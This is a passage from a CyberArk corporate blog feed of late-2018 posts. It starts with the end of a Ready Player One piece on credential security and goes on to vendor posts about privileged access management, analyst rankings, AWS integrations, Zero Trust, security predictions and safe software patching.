Parzival successfully completes the first challenge and is almost immediately summoned and propositioned by Sorrento to work for IOI to win the remaining two. Sorrento makes a crucial privileged access security mistake by showcasing his fancy gaming rig and inadvertently revealing his password (hidden in plain sight, written on a post-it note) used to log into the OASIS.

Greasing the tracks again on the storyline, the second challenge is completed and shortly after that, the sidekick and love interest of our hero, Samantha Cook (avatar name: Artemis) is apprehended, held captive and forced to work for IOI. In an effort to save Artemis, Parzival and his clan ingeniously execute a man-in-the-middle (MITM) attack by remotely intercepting Sorrento’s attempts to access the OASIS with the credentials they’ve obtained from his rig. They successfully tap into Nolan’s feed, get the location and specifications of Artemis’ cell and instruct her how to escape.

Quoting directly from the movie:

“How much of Sorrento’s rig do you remember?”…“Pretty much everything”

“A fixed rig is easy to locate and hard to hack”…“unless he’s (Nolan Sorrento) stupid enough to leave his password lying around”

Once freed, Artemis casually walks over to Sorrento’s rig and with the same stolen credential, becomes the ultimate insider threat by impersonating him as a privileged user and steals confidential information that ultimately helps win the final challenge, granting total control over the OASIS to Parzival and his clan. Important note: Multi-factor Authentication (MFA), retinal scanning or any futuristic equivalent of validating and authenticating users had also not been implemented, proving IOI to have arguably the worst futuristic security posture of all time.

Don’t Leave Your Passwords Lying Around

The heroes in this story would not have been successful if foundational credential security and management had been in place. It goes without saying that leaving privileged passwords lying around in plain text is a terrible security practice, and when credentials are left to be managed manually, it can become extremely costly. Even in the year 2018, some IT teams are still tasked with manually rotating and updating privileged credentials to comply with internal policy or industry regulatory compliance. These processes are extremely time-consuming and prone to human error. Without tools in place to automate and synchronize credential changes across systems, organizations can face high operational costs as well as lost productivity caused by accidental account lockouts.

The CyberArk Privileged Access Security Solution automatically stores and rotates credentials based on whatever policy you set. The solution can perform automatic credential invalidation to prevent malicious users from escalating privileges and performing reconnaissance inside the environment. Taking it one step further, the solution provides both anomalous and high-risk detection and alerting capabilities. These capabilities would have certainly helped Sorrento protect his rig and mitigate the risk of both initial compromise and privileged data exfiltration. The alerts produced by CyberArk contain detailed, user-level intelligence including the number of compromised machines, the date and time of the malicious activity, and the IP address being used; which would’ve enabled IOI’s security team to be able to quickly respond to the numerous attacks from Parzival and his clan.

CyberArk is not in the business of protecting villains or evil enterprises, but we are committed to protecting the keys to the IT kingdom. Again, quoting the movie directly:

“The keys are invisible, hidden in a dark room at the center of a maze.”

At the climax of the story, the IOI team was so close to completing the third and final challenge. They successfully won ‘Adventure’ on the Atari 2600 but failed to understand that in order to win the competition, they needed to locate the key located in the heart of a sealed chamber, which provided access to a highly sought after ‘privileged secret’ within the game – the keys to the kingdom.

Protect your keys – whether SSH keys, AWS key pairs, passwords, secrets or any other privileged credential. Take the first step and discover your “keys” with a CyberArk DNA scan or request a live demo to see how CyberArk can keep you safe from the cyber attacks of today and tomorrow.

]]>
CyberArk Named a Leader in Gartner’s Inaugural 2018 Magic Quadrant for Privileged Access Management https://www.cyberark.com/blog/cyberark-named-a-leader-in-gartners-inaugural-2018-magic-quadrant-for-privileged-access-management/ Wed, 05 Dec 2018 16:09:42 +0000 https://www.cyberark.com/?p=31083

Today marks a major milestone with the release of the first-ever Gartner 2018 Magic Quadrant for Privileged Access Management.* CyberArk was named a Leader, positioned highest for ability to execute and furthest for completeness of vision.

As the market pioneer, not only is this a major accomplishment for us as an organization, but it’s also an important milestone for the market at large. According to the report, “Privileged access management is one of the most critical security controls, particularly in today’s increasingly complex IT environment. Security and risk management leaders must use PAM tools in a long-term strategy for comprehensive risk mitigation.”

As the company recognized for establishing the market category, we are extremely proud to be named a Leader. We remain laser-focused on helping organizations to secure the enterprise by delivering innovative solutions that break the attack chain and protect their most valuable assets. We will continue our work to make a quantifiable impact on the security of companies and governmental organizations around the world, enabling them to adopt digital transformation strategies with confidence.

As we celebrate being named a Leader in the Gartner Magic Quadrant for Privileged Access Management, we’d like to thank all of our incredible customers, partners and employees who have been, and will continue to be, the cornerstone of our success.

Read the Full Report

 Download the full 2018 Magic Quadrant for Privileged Access Management report here. To learn more about the CyberArk Privileged Access Security Solution or to see what customers and other industry experts say about us, visit our website.

*Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018
Note: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
]]>
AWS Security Hub Extends Privileged Access Threat Analytics Capabilities with CyberArk https://www.cyberark.com/blog/aws-security-hub-extends-privileged-access-threat-analytics-capabilities-with-cyberark/ Thu, 29 Nov 2018 20:11:20 +0000 https://www.cyberark.com/?p=30782

Today’s most disruptive cyber attacks center on controlling an organization’s high-value assets with privileged access. Numerous headlines on cloud-related breaches tied to misconfigured Amazon S3 buckets, stolen access keys and more have made it clear that privileged accounts, credentials and secrets deliver an unobstructed pathway to critical infrastructure and applications in the cloud.

CyberArk, an AWS Partner Network (APN) Advanced Technology Partner, provides industry-leading privileged access security support for the AWS community and ecosystems. With a commitment to innovation and a focus on mitigating the risks of emerging cyber threats, CyberArk empowers cloud-first organizations to fortify their security and gain a competitive edge by putting privilege at the center of their digital transformation initiatives.

Further extending this commitment, CyberArk today introduced integration with the newly unveiled AWS Security Hub and CyberArk Privileged Threat Analytics, part of the CyberArk Core Privileged Access Security Solution. This integration enables organizations to collect, detect, view, alert and respond to high-risk privileged access activity across their entire AWS environment.

Detect and Prevent Privileged Access Attacks

AWS Security Hub is designed to provide users with a comprehensive view of their high-priority security alerts and compliance status by aggregating, organizing and prioritizing alerts, or findings, from multiple AWS services such as Amazon GuardDuty, Amazon Inspector and Amazon Macie, as well as from APN security solutions. The findings are then visually summarized on integrated dashboards with actionable graphs and tables.

The CyberArk integration brings the benefits of Privileged Threat Analytics to the Security Hub, providing organizations with deeper, data-driven insights and enhanced detection capabilities, enabling them break the attack lifecycle quickly.

With CyberArk, AWS Security Hub customers gain:

  • Unprecedented Privileged Access Analysis. By integrating seamlessly with leading SIEM solutions, CyberArk collects, analyzes and delivers enterprise-wide, real-time insights on privileged access activity to help organizations mitigate security risks linked to unauthorized access, impersonation, fraud and theft.
  • Best-of-Breed Threat Detection. The CyberArk Privileged Threat Analytics engine leverages statistical modeling, machine learning, behavioral analytics and deterministic algorithms to rapidly detect malicious activity. For example, an insider who has gained access to privileged credentials or secrets can initiate seemingly legitimate privileged user sessions. CyberArk’s automated, real-time detection and alerting capabilities can quickly identify these stealthy insider attacks.
  • Critical Context. CyberArk analyzes, classifies and ranks each threat finding, while providing recommended actions for remediation. This allows organizations to zero in on specific findings such as lateral movement activity. CyberArk then feeds this valuable information to the AWS Security Hub, which ingests the data using a standard findings format, then correlates information across AWS services and AWS partner tools to help organizations visualize and prioritize the most important findings (see Figure 1 below).

 

Figure 1. The AWS Security Hub console displaying alerts and detections forwarded by CyberArk Privileged Threat Analytics

Joint AWS and CyberArk customers can take advantage of this integration now through a subscription model. To learn more, please visit the CyberArk Marketplace.

CyberArk provides broad and deep privileged access security for organizations using AWS. In addition to this new integration with AWS Security Hub, CyberArk’s use of Amazon Machine Images (AMI) and AWS CloudFormation simplify the discovery and prioritization of privileged account risk in the cloud. Additional integrations with AWS, including automating the onboarding of credentials through integrations with Amazon CloudWatch and AWS Lambda, enable security teams to dramatically reduce the risk of unsecured credentials. To learn more about CyberArk support for the AWS community, visit https://www.cyberark.com/aws/.

]]>
CyberArk Achieved Advanced Tier Partner Status with Amazon Web Services https://www.cyberark.com/blog/cyberark-achieved-advanced-tier-partner-status-with-amazon-web-services/ Wed, 28 Nov 2018 22:01:55 +0000 https://www.cyberark.com/?p=30762

CyberArk is very excited to announce our achievement of Advanced Technology Partner status with Amazon Web Services (AWS). For background, the Amazon Partner Network (APN) is a global partner program for AWS, focused on helping APN Partners build successful AWS-based businesses or solutions by providing business, technical, marketing and go-to-market support. This achievement in our partnership with AWS reaffirms that we’ve built a strong AWS-based business, and it showcases proof of expertise. More importantly, it also provides CyberArk with additional tools and resources from Amazon enabling us to both invest in and differentiate our solution for our AWS customers with new features, new functionality and improved cloud security services. This also benefits our customers and partners.

CyberArk is the trusted leader in privileged access security, helping the world’s leading organizations to protect against external attackers and malicious insiders both in the cloud, on-premises and everywhere in between. Organizations use CyberArk solutions to protect the cloud workloads they deploy and run on AWS, securing their privileged accounts and credentials at each stage of their cloud journey. CyberArk offers several powerful integrations with AWS to bolster and increase the security of an organization’s cloud assets, including AWS Security Token Service (STS), Amazon Inspector, Amazon CloudWatch, AWS Lambda, and most recently AWS Security Hub.

CyberArk’s partnership with Amazon is longstanding. Beyond building new integrations throughout the past year, we’ve placed a big focus on simplifying the way our customers experience CyberArk at all different stages in AWS. First, expanding our automation capabilities with the addition of CyberArk AMIs (Amazon Machine Images) and AWS CloudFormation templates to automate the deployment of our solution in as little as 15 minutes, and more recently, we’ve listed the CyberArk Privileged Access Security Solution and Conjur Open Source products in the AWS Marketplace for easier consumption of CyberArk solutions for AWS customers. As we move into 2019, we plan to add additional products and solutions into the AWS Marketplace as well as integrate with even more AWS services. This gives our customers more options to meet high security standards for protecting cloud administrator and management consoles, compute environments, DevOps tools and more.

Connect With CyberArk at AWS re:Invent

We are live at AWS re:Invent. Be sure to visit the CyberArk booth #2823 in the Sands Expo and Convention Center (next to the Venetian) to discuss how CyberArk can secure your AWS workloads. Ask for a live demonstration of the solution.

]]>
CyberArk Version 10.6 is Here Just in Time https://www.cyberark.com/blog/cyberark-version-10-6-is-here-just-in-time/ Mon, 19 Nov 2018 18:49:44 +0000 https://www.cyberark.com/?p=30437

Organizations understand that securing privileged access is critical, which requires solutions to identify and systematically lock down accounts and systems with elevated levels of privilege. To effectively reduce risk, organizations must be able to fully manage, secure and automatically rotate credentials (especially for shared groups), while enabling employees to securely access critical target systems.

The concept of providing access to specific target systems during specific times when it is requested can be referred to as “just-in-time” access. This strategy is seen as a way to quickly install effective controls and provide privileged users the ability to access target machines without the need to manage and store credentials. These implementations are lightweight solutions that provide organizations the ability to introduce security protocols and help establish habitual security before segueing into a robust Privileged Access Security program. Version 10.6 of the CyberArk Privileged Access Security (PAS) Solution includes a feature that enables this option.

CyberArk’s Ad Hoc Access provides just-in-time access to Windows servers by placing an admin account on each desired system. When users require access to one of those particular systems, they must request access through the CyberArk console before they are allowed on to that system for a defined time period. Below is a screenshot showing what it looks like when an end user wants to “get access” to a Windows server that isn’t currently onboarded into CyberArk.

Once the time window has expired, they are removed from the admin account and, if needed, will have to request access to get back in. This is yet another control to signify steps towards privileged access by ensuring that privileged targets are only being used by the appropriate users at the appropriate time.

Workflow of an end user within CyberArk requesting Ad Hoc Access with just-in-time access to a Windows server

The steps to onboard and create Ad Hoc Access to Windows servers with the CyberArk Privileged Access Security solution are simple.  First, discover local admins on targets via Accounts Discovery. Second, onboard the local admin for each target. Access is then granted to end-users using Ad Hoc Access for a specified time period.

While just-in-time solutions certainly have benefits, it is worth mentioning that by design these solutions provide minimal visibility into what users are actually doing on these unmanaged targets since session activity on these systems are neither isolated nor recorded. However, this is a more secure solution than completely unmanaged local admin accounts.

This feature addition to the CyberArk Privileged Access Security Solution is meant to be a complement to privileged access security programs and projects. Ad Hoc Access should be seen as a method to encourage teams to install privileged controls, even if they are unable to fully manage local administrator accounts and credentials with session isolation and monitoring.

As another alternative, CyberArk also offers customers the ability to utilize Privileged Session Manager Ad Hoc Connection functionality, which provides pre/post scripts to add or remove users from unmanaged targets to connect via Privileged Session Manager. This feature provides similar ease of use to Ad Hoc Access with the added security benefit of session isolation and monitoring. However, Privileged Session Manager Ad Hoc Connection is typically leveraged when an administrator already has an account on the target machine, and knows the destination information and credentials. Within the CyberArk console, an end user is prompted to enter the platform, client, address, username and password of the target system and is then connected via Privileged Session Manager. These unmanaged targets can be accessed on an ad hoc basis to connect privileged users to any unmanaged target system (not just Windows servers) through Privileged Session Manager.

CyberArk always urges customers to be as secure as possible, but we understand that every organization is different. Providing customers with the ability to set up ad hoc policies to reduce friction for end users is an option for certain types of targets, and can be seen as another way to implement privileged access controls. The Privileged Session Manager Ad Hoc Connection is a way for organizations to avoid managing local administrator credentials while providing an audit trail of privileged sessions, but may still be met with resistance from end users. Ad Hoc Connection with just-in-time access to Windows servers provides the ability to now manage local administrator accounts without the audit trail, thus reducing the steps needed for end users. Inevitably it’s up to each organization to make the decision that best suits their operational and security needs alike. However, both Ad Hoc methods should be seen as ways to increase user adoption by reducing some of the friction, rather than the most secure method of fully managing target systems that help achieve fully managed and secured privileged access.

For more information on the CyberArk Core Privileged Access Security solution please click here. CyberArk has also recently published the “Top 5 Reasons to Prioritize Privilege Today” showcasing why privileged access security should be top of mind for every organization.

 

]]>
Reason to Celebrate: CyberArk Named a Privileged Identity Management Leader https://www.cyberark.com/blog/reason-to-celebrate-cyberark-named-a-privileged-identity-management-leader/ Wed, 14 Nov 2018 15:12:35 +0000 https://www.cyberark.com/?p=30374/

Independent research firm Forrester Research today released The Forrester Wave™: Privileged Identity Management, Q4 2018.1 For the report, Forrester evaluated the 11 most significant privileged identity management vendors and identified CyberArk as a Leader.

In our opinion, privileged identity management is crucial to strengthening an organization’s security posture and improving risk management.  According to the report, “The [CyberArk] solution has strong password safe, session management, and privileged threat analytics, as well as the broadest DevOps support of any vendor evaluated in the Forrester Wave.”

CyberArk ranks highest in the “Current Offering” and “Market Presence” categories and received the highest possible score for criteria including customer satisfaction, cloud and DevOps support, privileged threat/behavior analytics, privilege delegation and escalation, privileged session monitoring and container support plans, among others.

The CyberArk Privileged Access Security Solution is the most comprehensive solution on the market when it comes to protecting privileged accounts, credentials and secrets at the endpoint, on-premises, on the hybrid cloud and in DevOps environments.

We are proud to be named a Leader by Forrester. This milestone represents a great opportunity to thank our customers and partners who continue turn to CyberArk as trusted advisor while rolling out modern infrastructure, improving business agility and driving new opportunities for growth.

To read the full report, The Forrester Wave™: Privileged Identity Management, Q4 2018, click here.

_______

1 – The Forrester Wave™: Privileged Identity Management, Q4 2018 by Andras Cser, November 14, 2018

]]>
The Year Ahead: CyberArk’s Top 2019 Cyber Security Predictions https://www.cyberark.com/blog/the-year-ahead-cyberarks-top-2019-cyber-security-predictions/ Tue, 13 Nov 2018 13:44:19 +0000 https://www.cyberark.com/?p=30363/

Cyber security’s 2018 megatrends and myriad emerging threats have created the perfect storm for a tumultuous 2019. From never-before-seen attacks on newly engineered biometric markers and the broad embrace of blockchain, to expanded risks posed for “new” critical infrastructure and the transfer of trust, organizations must look to the threat horizon, and accelerate and collaborate to out-innovate and out-maneuver the attackers.

As we head into 2019, here are five security predictions to prepare for:

 1. Prediction: Emerging ‘Unique Human Identities’ Under Attack

We’ll see a new wave of attacks against emerging ‘unique human identities’ – or newly engineered biometric markers for digital and physical authentication. Biometric fingerprint, voice and face ID authentication controls have proven effective in consumer devices, and organizations will look to new authentication methods – like embedded human microchips, for example. Attackers will increasingly target these identities to gather massive amounts of biometric data for future modelling purposes and nefarious use. Genetic consumer-services, biometric stores within organizations and more will become key targets, further elevating privacy concerns.

 2. Prediction: Government Social Media Becomes Regulated as Critical Infrastructure

Governments will start counting government sanctioned social media accounts – both for elected officials and agencies – as critical infrastructure. Much like government text messages are regulated in numerous ways, social media will become regulated as well.

Social media has emerged as a critical tool for governments to communicate with citizens. Whether it’s individual politicians and elected officials, or the official accounts of government agencies and organizations, social media is quickly emerging as one of the top pathways for a government to communicate with citizens.

While social media allows for the rapid dissemination of critical information, it also has a dark side, illustrated in the past year by the false missile alerts that sent residents of Hawaii and Japan into a panic. This provides a glimpse of how attackers could use official social accounts to spread chaos.

 3. Prediction: Trade Wars Trigger Commercial Espionage

Government policies designed to create ‘trade wars’ will trigger a new round of nation-state attacks designed to steal intellectual property and other trade secrets to gain competitive market advantages. Nation-state attackers will combine existing, unsophisticated, yet proven, tactics with new techniques to exfiltrate IP, as opposed to just targeting PII or other sensitive data.

While these attacks will predominantly be carried out by malicious external attackers, we’ll also see an uptick of insider attacks, especially in cutting-edge industries like autonomous cars (much like occurred at Apple in June 2018). We’ll see attacker dwell times extend as nation-states spend more time conducting reconnaissance and carrying out these trade-driven attacks. We’ll also see the emergence of nation-state weapons commercialized on the black market. This same phenomenon happened after Stuxnet, Petya and NotPetya – where cyber criminals take pieces of code from massive nation-state attacks and incorporate them into their attacks.

 4. Prediction: Supply Chain Meets Blockchain

Blockchain will transform the supply chain in 2019. Following allegations of nation-states targeting the supply chain at the chip level to embed backdoors into both B2B and consumer technologies, organizations will embrace blockchain to secure their supply chains. The distributed nature of blockchain makes it well suited to validate every step in the supply chain – including the authenticity of hardware and software. We’ll continue to see increased attacks early on in the supply chain, and there will be greater need for this level of validation.

 5.  Prediction: Enterprises Transfer Trust and Risk…to Google and Facebook?
The embrace of Google’s BeyondCorp strategy – shifting access controls from the network perimeter to individual users and devices without the need for a traditional VPN – will expand the attack surface in 2019 if the necessary controls are not put in place. This ‘zero trust’ approach can open up several attack vectors. First, it transfers risk and trust to third parties, like Google or Facebook, with velocity. Identity providers are exposed to an expanding attack surface through the use of authentication protocols and short-lived tokens or temporary API keys that can be compromised. This transfer of trust, also opens up the very real possibility of attackers weaponizing identity provider assets or services to expose credentials or allow privileged access.

Second, the BeyondCorp approach requires an organization to expose some of its infrastructure in order to allow employees to use applications or access the network. Anytime organizations expose assets to the outside world, they also expose the mistakes they’ve made. Whether it’s ports that are open that shouldn’t be or misconfigured security settings, for example, attackers will look to exploit these visible weaknesses.

Editor’s note: To stay on top of emerging threats, read CyberArk’s Threat Research blog for original research – including new vulnerability discoveries – from CyberArk Labs and the CyberArk Red Team, which are constantly researching and assessing attack vectors.

]]>
PAM vs. PIM: Privilege by Any Name Any Name Is a Priority https://www.cyberark.com/blog/pam-vs-pim-privilege-by-any-name-is-a-priority/ Fri, 09 Nov 2018 14:19:36 +0000 https://www.cyberark.com/?p=30346/ Privileged Access Management

Privileged accounts, credentials and secrets – and the access they provide – represent the largest security vulnerability enterprises face today. Nearly all of the most destructive cyber attacks this decade were executed by successfully exploiting privileged access. As such, managing and securing privilege is increasingly an organizational priority and a core component of an effective cyber security strategy. But, knowing where to start can be confusing. The market offers an alphabet soup of different terms and tools for addressing privileged access security. For example, consider Privileged Access Management, aka PAM, and its close associate, Privilege Identity Management, aka PIM.

To add to the confusion, even top industry analysts like Forrester and Gartner don’t agree on whether to use PAM or PIM. The Gartner Magic Quadrant refers to managing and securing privilege as PAM and the Forrester Wave refers to it as PIM.

However, at the end of the day, privilege by any name is a priority, which is why the Center for Internet Security (CIS) now lists “Controlling the Use of Administrative Privileges” as a basic CIS control.   There is also common ground found within the category, with recommendations for best practices and vendor selection provided by trusted industry analysts such as Forrester, Gartner, IDC and KuppingerCole. Vendors who fall into PAM or PIM categories typically offer the following capabilities:

  1. Vault and rotate passwords and other credentials.
  2. Isolate, monitor, record and audit privileged sessions.
  3. Control privileged commands, actions and tasks, including privilege delegation and elevation.
  4. Leverage analytics to monitor for anomalous activities involving privileged access.
  5. Manage and broker credentials and secrets for applications from traditional commercial off-the-shelf applications to new cloud-native applications built using DevOps tools and methodologies.

As it relates to analytics, some analysts do not consider this to be a separate capability. They instead cover analytics as a feature that enhances vaulting, session isolation and controlling privileged sessions. The degree of emphasis placed on securing the credentials used by DevOps tools and cloud-native applications vs. traditional commercial off-the-shelf applications depends upon the analyst firm. Of course, what ultimately matters across these five areas of privileged access will depend on the priorities of your business and your security organization.

Interestingly, privileged access management for end-user endpoints (a.k.a. workstations) is not included on the list above since not all analysts consider this part of the PAM or PIM category. That being said, many vendors who fall into the PAM or PIM category, including CyberArk, offer solutions that limit privilege on end-user endpoints, especially since many attacks involving privileged access start there.

So, where does the CyberArk Privileged Access Security Solution come in, you might ask? CyberArk provides a critical layer of IT security to protect data, infrastructure and assets across the enterprise, in the cloud and throughout the DevOps pipeline. CyberArk has a strong track record for product innovation and a dedicated focus on customer success that includes offering multiple deployment options, including on-premises, cloud and as-a-service.

If you’re here to learn more about securing privileged access, here are some resources you might find of value:

It’s time to put semantics aside and focus on what’s truly important: securing privileged access across your enterprise to ensure you can reduce risk from external attackers or malicious insiders and launch new initiatives – such as investing in modern infrastructure and supporting digital transformation strategies – with confidence.

]]>
What Is Zero Trust and Why Is it So Important? https://www.cyberark.com/blog/what-is-zero-trust-and-why-is-it-so-important/ Wed, 07 Nov 2018 20:08:56 +0000 https://www.cyberark.com/?p=98911 Image of a shield with a zero on it to metaphorically represent Zero Trust cybersecurity.

Zero Trust.

You’ve heard about it. A lot. But there are quite a few nuances when it comes to how Zero Trust security is defined and discussed. Is it a platform or a principle? It’s one of those terms that’s so widely cited that it has the tendency these days to elicit eye rolls within the cybersecurity industry and to be referred to as a buzzword by those sitting at the cool kids’ lunch table.

At its core, though, Zero Trust is a strategic cybersecurity model enabled to protect modern digital business environments, which increasingly include public and private clouds, SaaS applications, DevOps and robotic process automation (RPA). It’s a critical framework, and every organization should adopt it and understand the fundamentals of how it works. Identity-based Zero Trust solutions like single sign-on (SSO) and multi-factor authentication (MFA) are designed to ensure that only authorized individuals, devices and applications can access an organization’s systems and data.

Stated simply, Zero Trust works on the holistic approach that you can’t separate the “good guys” from the “bad guys.” Traditional approaches that focused on establishing a strong perimeter to keep the bad guys out no longer work. In today’s world, the rapid pace of digital transformation, increased use of cloud services and adoption of hybrid work has created a continually shifting enterprise environment that’s chaotic and difficult to secure. This resulted in the “never trust, always verify” Zero Trust approach to secure identities, endpoints, applications, data, infrastructure and networks, while providing visibility, automation and orchestration.

With Zero Trust, no actor can be trusted until they’re verified. Nobody. No one. Zero exceptions. It’s a holistic, strategic framework for security that ensures everyone – and every device – granted access is who and what they say they are.

So, Why Zero Trust?

Today, cybersecurity incidents ranging from ransomware and phishing to denial-of-service attacks dominate the news. An increase in cloud applications, mobile devices, remote workers and IoT-connected devices has forced organizations to align their security policies based on business intent. Embracing Zero Trust means adopting technologies, ways of working and policies that support business agility while enhancing security.

Consider these findings:

  • Ransomware breaches rose 13% from 2021, representing an increase greater than the past five years combined.
  • Seventy-one percent of organizations suffered a successful software supply chain-related attack in the past year, resulting in data loss or asset compromise.
  • Meanwhile, the average cost of a data breach hit an all-time high of $4.35 million in 2022.

So, before an organization can take advantage of Zero Trust, it must create a set of identities for its employees, their devices and the applications they use. Most importantly, it is essential that all these capabilities are integrated and work together so they can be applied in real time without adding delays to access decisions for APIs or for users who are logging onto applications.

From Novel Cybersecurity Concept to De Facto Approach

The phrases “Zero Trust” and “Zero Trust architecture” were coined by industry analyst John Kindervag in 2010, who recognized the futility of perimeter-based security. Though the philosophy upended conventional thinking about infrastructure, network and data security, it began to take hold as identity-based threats surged. Fast-forwarding to the present day, Zero Trust is the de facto cybersecurity approach – the digital modernization measuring stick championed by government and industry leaders alike. Why? Because identity is more important than ever.

  • Identities are everywhere: The average staff member now has 30 identities and machine identities outnumber these human identities 45:1.
  • Identity is the easy way in: 52% of organizations don’t protect identities linked to business-critical applications, and nearly half lack Identity Security controls around cloud infrastructure and workloads. Meanwhile, 87% report that secrets are stored in multiple places across DevOps environments.
  • Identity worries keep teams up at night: Security leaders say credential threat is their number one area of risk. As more assets move to the cloud, hybrid work becomes the “forever” model, digital transformation continues and third-party access needs expand, attackers are targeting identities that aren’t often secured and properly managed.

With this as a backdrop, it’s no surprise that 88% of senior security executives say adopting more of a Zero Trust approach is “very important” or “important.” And many are taking action. According to Enterprise Strategy Group’s (ESG) research report “The Holistic Identity Security Maturity Model,” more than half of global organizations surveyed have implemented or have started to implement a well-defined Zero Trust strategy across their IT real estate to enable Zero Trust.

The Five Principles of Any Zero Trust Implementation

Many frameworks exist to help organizations move toward Zero Trust, such as CISA’s Zero Trust Maturity Model and NIST’s SP 800-207 Zero Trust Architecture. Since every company is different, these frameworks are designed to guide – not prescribe – Zero Trust strategy and roadmap development, along with implementation and compliance. While this leaves room for flexibility, every effective Zero Trust program should share five constants:

  1. Strong, adaptive authentication. Adding an adaptive form of MFA with intelligent risk-based access strengthens password security and provides important user behavior analytics for everyone’s benefit. Organizations can spot potential threats faster, and users can simply and securely access resources.
  2. Continuous approval and authorization. Reauthenticating and revalidating user identities (after high-risk web browser sessions or periods of inactivity, for example) help ensure the right user has access to the right resources.
  3. Secure, least privilege access. Intelligently granting access to individual enterprise resources – from the endpoint to the cloud – requires advanced privileged access management (PAM) controls. The most effective approaches enable dynamic provisioning, such as granting just-in-time (JIT) privileged access on a per-session basis to reduce standing privileged access risks.
  4. Continuously monitor and attest. Just as privilege is not binary, neither are access decisions. Continuously monitoring is the best way to understand what is happening and confirm it should be happening, while detecting anomalies as they arise and maintaining optimal system security.
  5. Credential and authentication protection. Endpoint privilege management is the cornerstone of strong endpoint protection, critical for detecting and blocking credential theft attempts (via software abuse or memory scraping), enforcing least privilege consistently (including local admin rights removal) and applying flexible application control (such as allow-listing for well-known sources) to defend against malware and ransomware.

Graphic illustrating the five principles of a Zero Trust cybersecurity model.

Five principles of Zero Trust strategic cybersecurity model

While definitions for these principles (or “tenants” or “pillars”) vary somewhat across frameworks, Identity Security is foundational to all of them. Apply these identity-based principles first to accelerate the journey, measurably reduce risk and improve business outcomes.

Identity Security as the Central Pillar of Zero Trust

By now, it should be clear that Zero Trust is not a single technology but an approach for denying access by default, verifying every identity, validating every device and intelligently limiting access to every resource. Identity Security offers a robust set of unified access controls to enable Zero Trust by:

  1. Enforcing least privilege and securing access for humans and machines across any device, anywhere.
  2. Introducing intelligent privilege controls — and infusing them across the board — to help isolate and stop attacks, protect critical assets and grant access for just the right amount of time.
  3. Automating management of the identity lifecycle through seamless, no-code app integrations and workflows, taking control of excessive permissions to enforce least privilege.
  4. Continually monitoring for threats so enterprises can adjust controls based on user behavior to identify when an identity has been compromised.

With Identity Security as the backbone of a Zero Trust approach, teams can focus on identifying, isolating and stopping threats from compromising identities and gaining privilege before they can do harm.

Putting Your Trust in Zero Trust

Zero Trust security is a journey, not a destination. It’s an iterative process. As such, organizations need other security measures to complement mature and measurable Zero Trust programs. Most importantly, it’s not a one-time implementation but an ongoing process that requires continuous monitoring and improvement to boost your cybersecurity posture.

For a deeper dive into Zero Trust, check out the CyberArk whitepaper “Zero Trust’s Evolution: The Role of Identity Security.”

]]>
Securely Patch Software with CyberArk Endpoint Privilege Manager https://www.cyberark.com/blog/securely-patch-software-with-cyberark-endpoint-privilege-manager/ Tue, 06 Nov 2018 20:12:21 +0000 https://www.cyberark.com/?p=30326/

When organizations update or patch software, decisions have to be made about which code changes to install within the network to improve systems and/or fix security vulnerabilities. For IT administrators, prioritizing and scheduling upgrades can be a tall but necessary order. They also need to get their teams on board, because patching or updating systems can slow production while workstations are restarted, and employees frequently see pop-up windows instigating a restart for their computers to perform the upgrade. There are also growing concerns among security teams that attackers might inject malicious software onto the network during upgrade periods or trick end users, as recently seen with cryptomining malware that was thought to be an Adobe flash update.

Updating software helps organizations remedy certain vulnerabilities or bugs, improve workstation performance and introduce new features. The Petya attack in 2017 raised awareness of the dangers of not patching or updating software. Yet somehow even with inherent benefits and recently heightened awareness, 44 percent of organizations today say it still takes weeks to apply security patches; with 30 percent reporting that it takes a month or longer to do so.

Despite the potential operational burdens and growing concerns of attackers targeting software updates as a network entry point, staying current with patches is both critical as well as a recommended best practice.

As organizations continue to improve their ability to programmatically upgrade and patch software, attackers are in turn getting stealthier. In organizations where end users and IT teams typically opt to update and patch software promptly, attackers have predictably adapted their strategies to counter this move. Often, they will target software updates with an effort to get in and create backdoor access, spread malware and/or just generally wreak havoc. In short, attackers refined the ways they can install malware or inject malicious software into endpoints during updates and patches.  A potential path could involve sending a phishing mail that prompts an unsuspecting user to install a fake update and install malware on their system. For example, a 2018 campaign dubbed “Fake Updates” spread bogus patches for software such as Google Chrome, Mozilla Firefox, Internet Explorer and Adobe Flash Player.

Now might be the time that you ask, “Why bother updating software if attackers are going to try to get into my organization that way?” It bears repeating that regular software updates are critical to risk reduction. In choosing to ignore this, organizations will find themselves with a mixed and matched network comprised of legacy and modern versions of software; which has been proven time and time again to be very risky. That’s why it’s so crucial to not only have a strategy in place to consistently upgrade and patch your systems, but to also do so in a secure, controlled way.

There are three steps that every organization should take in order to safely patch their software.

  • First, identifying and establishing a patch management process helps to reduce the security vulnerabilities associated with unpatched software. It is recommended that security teams document and standardize patching by writing down repeatable steps and processes for how the organization will address software updates and patches.
  • Second, organizations should use application whitelisting to prevent attackers from misleading people into downloading “fake” or malicious patches that spread throughout the organization.
  • And finally, deploying upgrades in test environments to ensure safety is also critical because it allows security teams to check and verify that patches are safe to rollout to the entire team.

Maintaining security and operational use during patching supports a successful program, but it can be difficult to find tools and strategies that provide both components. CyberArk Endpoint Privilege Manager is typically deployed by organizations that want to protect against credential theft on endpoints and also want to protect against fake patches with application whitelisting. CyberArk Endpoint Privilege Manager creates application control and privilege elevation policies based on trusted sources such as SCCM (System Center Configuration Manager), software distributors, updaters and URLs, to name a few examples. This means that even if a user attempted to install a rogue software update, CyberArk Endpoint Privilege Manager would identify the patch as untrusted and not let it run.

Having tools in place to allow administrators and security teams to verify unknown applications and identify potentially dangerous malware is important to help reduce the risk and mitigate damage from anattack.

It may feel like you are stuck between a rock (call this operations) and a hard place (security), but we’re here to help. For more information on how to secure your most sensitive assets, including how to secure your organization’s endpoints, please click here or reach out to our team to discuss further.

]]>
New KuppingerCole Report Highlights the Importance of Securing DevOps and Agile IT Environments https://www.cyberark.com/blog/new-kuppingercole-report-highlights-the-importance-of-securing-devops-and-agile-it-environments/ Thu, 01 Nov 2018 18:47:53 +0000 https://www.cyberark.com/?p=30211/

